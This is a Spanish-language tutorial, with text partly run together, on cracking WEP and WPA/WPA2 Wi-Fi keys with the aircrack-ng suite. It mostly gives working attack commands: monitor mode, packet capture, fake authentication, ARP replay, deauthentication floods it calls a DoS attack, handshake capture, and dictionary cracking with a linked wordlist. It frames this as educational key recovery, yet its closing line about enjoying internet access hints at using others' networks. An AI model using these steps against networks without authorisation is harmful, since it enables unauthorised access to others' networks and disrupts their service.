Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Tutorial Aircrack
Tutorial Aircrack
Paolo Norambuena
Estudiante Ingeniera (e) en Computacin e Informtica Universidad del Bo-Bo, Concepcin.
TutorialdeAircrackngbyPaoloNorambuenaislicensedunderaCreative CommonsAtribucinNoComercialLicenciarIgual2.0ChileLicense.
TutorialdeAircrackngbyPaoloNorambuenaislicensedunderaCreative CommonsAtribucinNoComercialLicenciarIgual2.0ChileLicense.
AIRCRACKNG
EstaesunaguaconfineseducativosparaelusoymanipulacindeAircrackng sobre las distintas distribuciones de Linux. Se explicar desde su instalacin en sistemas como Mandriva, Ubuntu, Debian, OpenSuse y SlackWare para que posteriormentenoexistandudassobreningunadistribucin.
En primer lugar debemos tener instalado en nuestro sistema el Driver del Fabricante de nuestra tarjeta de red, aircrackng no funciona con drivers
emuladosporndiswrapper.
InstalandoAircrackng
Ubuntu.
$sudoaptgetinstallaircrackng
Mandriva
#urpmiaircrackng OpenSUSE
Descargar:
ftp://ftp.pbone.net/mirror/packman.iubremen.de/suse/11.0/SRPMS/aircrackng1.0rc3 0.pm.1.nosrc.rpm
InstalarhaciendoDobleClickalpaqueteunavezdescargado.
SlackWare
Unavezdescargadoporconsola(terminalkonsole,etc),ejecutar
#installpkgaircrackng1.0rc3i4861dd.tgz
Paquetescomplementarios.
Unavezinstaladoaircrackngpuedesernecesariolainstalacindeunpaquete adicional por lo cual descargaremos IW, que es un complemento para poner nuestratarjetainalmbricaenmodomonitor.
Instaladay/oactualizadalalibreraprocedemosadescargariw.
Ydeestaformayatenemosaircrackngysucomponenteparaponerenmodo monitornuestrawireless.
Ahorasolonosquedaempezaratrabajar.
RecuperandoClaves.
Ahoraempezamosnuestrotrabajo,loqueserealizanteriormentesolosehace unavez,queesparainstalaryconfigurardebuenaformanuestrasuite,loquese realizasiempreesloqueacontinuacinsedetalla.
Paraquienescreenquecambiarsumacesnecesario,puedenhacerloasi
Mandriva:
Debian/Ubuntu:
Slackware:
IMPORTANTE:LasdireccionesmacSIEMPREdebeniniciarcon00
ParasabercualesnuestraMACdebemosejecutar
#ifconfig(wlan0,eth1,etc)|grepHwaddr
De la vista anterior podemos sacar nuestra direccin mac de HWaddr la serie numerica queacompaa lainstruccin antes destacada es nuestradireccin, queutilizaremosdesdeahoraenadelante.
Airmonng.
Airmonng es parte de la suite de aircrackng la cual permite crear la interfazmon0enmodomonitor.Suutilizacineslasiguiente
#airmonngstart(wlan0,eth1,etc)
En caso de que nos muestre un error podemos utilizar iw que instalamos anteriormente. #iwdevwlan0interfaceaddmon0typemonitor
Yconestoyatenemoselprimerpasocompleto.
Airodumpng
#airodumpngmon0
Deestaformaveremostodaslasredesdisponiblesconsusrespectivoscanales, una vez que ya encontramos nuestra red creamos un filtro con el canal de trabajo,enestecasocanal6(columnaCH),paramoslaejecucindeairodump ngpresionandoCtrl+C,yposteriormenteejecutamos:
c=Filtrodecanal6,11,1,etc. w=Escribirresultadosenundocumento.
#airodumpngc6wnombremon0
Deestaformahemoscreadounfiltroquesolotrabajarenelcanalindicado(6).
NuestraredesJimmy AireplayNg
Unavezqueairodumpngyaesttrabajando,abrimosunanuevaconsoladonde empezaremosatrabajarconaireplayng.
Loprimeroquedebemoshacerconaireplayngesasociarnosalared.
#aireplayng16000q10o1e(ESSIDRouter)a(MacRouter)h(nuestramac) mon0
Yaasociadosprocedemosaenviarycapturarpaquetes,paraesoenunanueva consolaejecutaremosnuevamenteaireplayngperoenmodoagresivo.
#aireplayng3b(Macdelrouter)h(nuestramac)mon0
Nuncaestdemsrecordarquemientrasmaspaquetescapturados,esmucho mejor,yaquemsprontoobtendremoslaclave.
EncasodequeesteataquenocapturepaquetesARPoqueenmuchotiempo hayamos capturado pocos paquetes, podemos realizar un Ataque DoS (DenegacindeServicios).Pararealizaresteataqueesnecesariosimplemente saberladireccinMacdelRouter,datoqueporlodems,hemosutilizadopara cadaaccinconaircrackngysuscomponentes.
AhoraComorealizamoselataqueDoSconaircrackng?
R://#aireplayng00a(MacRouter)mon0
Conesoyaestaramosacelerandolatransferenciaycapturadepaquetes.
AircrackNg
Ya estamos en el paso final, con los paquetes de datos capturados procedemosaejecutaraircrackng,paralocualtenemosdosformas,unalenta peroefectiva,yunarpidaperosenecesitaunamayorcantidaddepaquetes paradesencriptarlaclave. Formalenta #aircrackng*.cap
FormaRpida(senecesitamayorcantidaddepaquetescapturados) #aircrackngz*.cap
De esta forma ya hemos desencriptado la clave que buscabamos, solo nos quedahacerconfigurarlaclaveenelclientedeconexinparaesosolotienen queborrarlosdospuntos(:)quehayentrecadapardecaracteres,ahoraa disfrutardeinternet.
Recordatorio.
Losdriversparalastarjetasinalambricasdebenserlospropietarios,nosepuede realizarporemulacindedrivers,enestecasoconndiswrapper,porejemplo.
LasaccionesdebenserejecutadascomoSuperUsuario(root)enlossistemas quelopermitan,encasodeUbuntu,sedebeejecutarconsudo.
Las direcciones mac SIEMPRE deben iniciar con 00 en caso de que las cambienenformamanual.
Sinoaireplayngnoinyectanicapturapaquetes,realizamosunataqueDoS conaireplay#aireplayng00a(MacRouter)mon0
Todoloquetenga#enUbuntusedebeejecutarconsudo.
Finalizando.
Esperoqueestetutorialseadeutilidadparacadapersonaquelolea.Estetutorial est enfocado en una forma de ataque, en aircrackng existen muchos otros mtodos,algunosmscomplicadosqueotros,perolaideaesaprenderyadoptar laformamscmodaparacadauno.
Encasodeduda,contactarawjotta@gmail.com
TutorialdeAircrackngbyPaoloNorambuenaislicensedunderaCreative CommonsAtribucinNoComercialLicenciarIgual2.0ChileLicense.
Introduccin.
De seguro muchos se han preguntado, como poder recuperar la clave wpa/wpa2demiroutersintenerqueresetearlo?,buenoaligualqueantes,la respuestaesconaircrackng.
Enestaseccinsedemostrarcomoenunospocospasossepuedeobtenerla claveenformarpida,losingredientespararecuperarestasclavesson:
airmonng
Comenzandoconestapartedebemosponernuestratarjetaenmodomonitor
#airmonngstart(wlan0,eth1,etc)
En caso de que nos muestre un error podemos utilizar iw que instalamos anteriormente. #iwdevwlan0interfaceaddmon0typemonitor
Yconestoyatenemoselprimerpasocompleto.
Airodumpng
#airodumpngc(numerodecanal)w(nombrearchivo)mon0
Asestamosescaneandolasredesexistentesenunsolocanal,estaconsoladebe seguirtrabajandosinserdetenida.
Aireplayng
Yatenemoslosdatosnecesariosyairodumpngsigueenfuncionamiento,porlo cualahoraeselturnodeaireplayng.
Enunanuevaconsolaejecutamos: #aireplayng01a00:1A:70:EE:5E:D6c00:16:44:A2:40:D4mon0
dondetenemos
0:deautenticacin 1 : es el nmero de deautenticaciones enviadas (puedes enviar infinitas si se deseas.Parainfinitoes0) a:esladireccinMACdelpuntodeaccesooRouter c:esladireccinMACdelclientequequeremosdeautenticar De esta forma estamos capturando el handshake que necesitamos para desencriptarlaclave.
Paraaircracklasinstruccionessonlassiguientes #aircrackngwdiccionariob00:1A:70:EE:5E:D6*.cap
Yposteriormente,obtendremosnuestraclaveconunasalidacomoesta
Recomendaciones. ParatrabajarconclavestipoWPA/WPA2esnecesariopodercontarconunbuen diccionariodepalabras,yaqueeltrabajodeaircrackngesircomparandoel handshakeconcadaunadelaspalabrasdeldiccionarioquetenemos. Puedendescargarundiccionariodepalabrasdesdeaqu http://wjota.uuuq.com/tutoriales/diccionario.zip Que es el diccionario que se utiliz para el ejemplo, y puede ser modificado, agregandooquitandopalabras.
TutorialdeAircrackngbyPaoloNorambuenaislicensedunderaCreative CommonsAtribucinNoComercialLicenciarIgual2.0ChileLicense.